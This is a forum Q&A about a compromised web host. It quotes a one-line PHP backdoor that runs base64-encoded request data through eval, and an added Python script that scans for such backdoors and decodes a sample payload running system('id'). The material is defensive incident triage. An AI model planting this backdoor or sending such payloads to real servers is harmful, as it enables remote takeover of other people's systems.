
Possible Duplicate:
How do I deal with a compromised server?

Checking lfd.log, I noticed a block log entry for a script:

Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php

It looks like the script is trying to execute /usr/bin/php, but when I look at the code, it is a simple one-line file:

<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));

Has anyone had a similar experience, and is there any way to see what is causing the /usr/bin/php invocation? The logs say that the script is being called via POST.

Armand

1 Answer


Someone placed an attack script in this directory. If eval isn't deactivated in your PHP configuration, this will allow the attacker to execute arbitrary PHP code they send together with the request.

The script is invoked via a simple HTTP POST request.

You should consider your system compromised and try to find out how the attacker managed to place this script.

Sven
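A short triage script for the situation described in the question and answer, added here as an example and not part of the original post or of lfd/csf. It parses the quoted lfd "User Processing" line to recover the PHP file being run, scans a document root for the request-driven eval pattern (and a few common variants), and decodes a constructed POST body of the kind the backdoor expects, so you can see what the attacker actually executed. Note that the `function_exists('date_default_timezone')` test in the one-liner is a decoy: PHP has `date_default_timezone_set()` and `date_default_timezone_get()`, but no function named `date_default_timezone`, so the check always fails and the `eval` branch always runs. The temporary docroot, file names and POST body below are constructed for the demo; the reading of `Kill:0` as "reported, not killed" is an assumption about lfd's log format.

```python
"""Triage helpers for an eval(base64_decode($_REQUEST[...])) PHP backdoor.

Added example, not code from the original post or from lfd/csf. The
docroot, file names, lfd line and POST body used in demo() are constructed.
"""
import base64
import os
import re
import tempfile
from urllib.parse import parse_qs, quote

# The one-liner quoted in the question (kept verbatim as scanner input).
BACKDOOR_SRC = (
    "<?php\n"
    "function_exists('date_default_timezone') ? "
    "date_default_timezone_set('America/Los_Angeles') : "
    "@eval(base64_decode($_REQUEST['c_id']));\n"
)

# lfd "User Processing" alert, in the shape quoted in the question.
LFD_RE = re.compile(
    r"lfd\[\d+\]: \*User Processing\* PID:(?P<pid>\d+) Kill:(?P<kill>\d) "
    r"User:(?P<user>\S+) Time:(?P<secs>\d+) EXE:(?P<exe>\S+) CMD:(?P<cmd>.*)$"
)


def parse_lfd_line(line):
    """Return the fields of an lfd User Processing line plus the PHP script
    being run (first .php argument of CMD), or None if the line doesn't match."""
    m = LFD_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["secs"] = int(rec["secs"])          # how long the process has run
    rec["killed"] = rec.pop("kill") == "1"  # assumption: Kill:0 = reported only
    argv = rec["cmd"].split()
    rec["script"] = next((a for a in argv[1:] if a.endswith(".php")), None)
    return rec


# Source-level indicators of request-driven code execution. A regex scan is a
# first pass only: encoders (gzinflate, str_rot13, variable functions) evade it.
INDICATORS = {
    "eval(base64_decode($_REQUEST/...))": re.compile(
        r"@?\beval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I),
    "eval($_REQUEST/...)": re.compile(
        r"@?\beval\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I),
    "assert/create_function on request data": re.compile(
        r"\b(?:assert|create_function)\s*\(.*?\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I),
    "preg_replace with /e modifier": re.compile(
        r"preg_replace\s*\(\s*(['\"])/.*?/[a-z]*e[a-z]*\1", re.I),
}


def scan_source(src):
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_tree(root):
    """Walk root for .php files (including .inc.php etc.) and return
    {relative path: [indicators]} for every file that triggers at least one."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if ".php" not in fn:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


def decode_payload(body, param="c_id"):
    """Recover the PHP the attacker sent: the POST body is form-urlencoded and
    the parameter value is base64, exactly what the backdoor's
    base64_decode($_REQUEST['c_id']) consumes. None if the parameter is absent."""
    values = parse_qs(body).get(param)
    if not values:
        return None
    return base64.b64decode(values[0]).decode("utf-8", errors="replace")


def demo():
    """Constructed end-to-end run: parse the lfd line, scan a throwaway docroot
    holding the backdoor next to a benign file, decode a sample POST body."""
    lfd = ("Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 "
           "User:xxxx Time:610472 EXE:/usr/bin/php "
           "CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php")
    rec = parse_lfd_line(lfd)
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "fonts"))
        with open(os.path.join(root, "fonts", "article5.class.inc.php"), "w") as fh:
            fh.write(BACKDOOR_SRC)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php\ndate_default_timezone_set('UTC');\necho date('c');\n")
        hits = scan_tree(root)
    # Constructed request body: what a client sends to run system('id') via c_id.
    sent_php = "system('id');"
    body = "c_id=" + quote(base64.b64encode(sent_php.encode()).decode())
    return rec, hits, decode_payload(body)


if __name__ == "__main__":
    rec, hits, php = demo()
    print("lfd script:", rec["script"], "| killed:", rec["killed"])
    print("suspicious files:", hits)
    print("decoded payload:", php)
```

On a real server, point `scan_tree` at the account's `public_html` and feed `decode_payload` the bodies of the POST requests to that path from the web server's access log or a packet capture; the decoded PHP tells you what the attacker ran, which is the starting point for the "how did it get there" question the answer raises. Treat a clean scan as weak evidence only: the patterns above catch the plain variant on this page, not encoded or split-up droppers, so the compromised-host handling in the linked question still applies.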